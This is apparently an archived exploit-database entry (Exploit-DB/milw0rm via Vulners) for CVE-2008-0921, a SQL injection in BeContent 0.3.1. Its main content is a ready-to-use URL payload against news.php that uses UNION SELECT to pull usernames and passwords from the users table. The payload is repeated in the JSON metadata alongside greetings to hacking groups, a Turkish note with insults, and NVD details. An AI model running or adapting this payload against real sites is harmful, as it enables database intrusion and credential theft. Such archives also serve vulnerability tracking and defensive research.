Search...

BeContent 031 - id Remote SQL Injection Vulnerability

2008-02-21T00:00:00

ID EDB-ID:5170
Type exploitdb
Reporter Cr@zy_King
Modified 2008-02-21T00:00:00

Description

BeContent v.031 (id) Remote SQL Injection Vulnerability. CVE-2008-0921. Webapps exploit for php platform

                                        
                                            Founder By Cr@zy_King

HackShow.Us

BeContent v.031 (id) Remote Sql  Vuln.

Down : http://code.google.com/p/becontent/downloads/list?id_menu=9

Exploit:

news.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users

Greatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine

Not : Ayyildiz 'da Askeri Åžurada YayinladÄ±gÄ±m AÃ§Ä±klarÄ± KullananlarÄ±n hepsinin a.q yyim bunlarÄ±da kullananlarÄ±nda a.qyyim

AlayÄ±na Ä°syan KralÄ±na Hodri Meydan Sozum Metehan'a ;) Hadi eyw.

side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)

# milw0rm.com [2008-02-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5170", "hash": "a00a31c2dfe17661056af4d0ca10a0b2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BeContent 031 - id Remote SQL Injection Vulnerability", "description": "BeContent v.031 (id) Remote SQL Injection Vulnerability. CVE-2008-0921. Webapps exploit for php platform", "published": "2008-02-21T00:00:00", "modified": "2008-02-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5170/", "reporter": "Cr@zy_King", "references": [], "cvelist": ["CVE-2008-0921"], "lastseen": "2016-01-31T21:43:08", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5170/", "sourceData": "Founder By Cr@zy_King\n\nHackShow.Us\n\nBeContent v.031 (id) Remote Sql Vuln.\n\nDown : http://code.google.com/p/becontent/downloads/list?id_menu=9\n\nExploit:\n\nnews.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users\n\nGreatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine\n\nNot : Ayyildiz 'da Askeri \u00c5\u017eurada Yayinlad\u00c4\u00b1g\u00c4\u00b1m A\u00c3\u00a7\u00c4\u00b1klar\u00c4\u00b1 Kullananlar\u00c4\u00b1n hepsinin a.q yyim bunlar\u00c4\u00b1da kullananlar\u00c4\u00b1nda a.qyyim\n\nAlay\u00c4\u00b1na \u00c4\u00b0syan Kral\u00c4\u00b1na Hodri Meydan Sozum Metehan'a ;) Hadi eyw.\n\nside note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)\n\n# milw0rm.com [2008-02-21]\n", "osvdbidlist": ["42010"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-29T14:25:46", "references": ["http://www.securityfocus.com/bid/27928", "https://www.exploit-db.com/exploits/5170"], "description": "SQL injection vulnerability in news.php in beContent 0.3.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 2, "reporter": "NVD", "published": "2008-02-22T18:44:00", "title": "CVE-2008-0921", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:46", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-0921"], "scanner": [], "modified": "2017-09-28T21:30:30", "cpe": ["cpe:/a:becontent:becontent:0.3.1"], "id": "CVE-2008-0921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0921", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}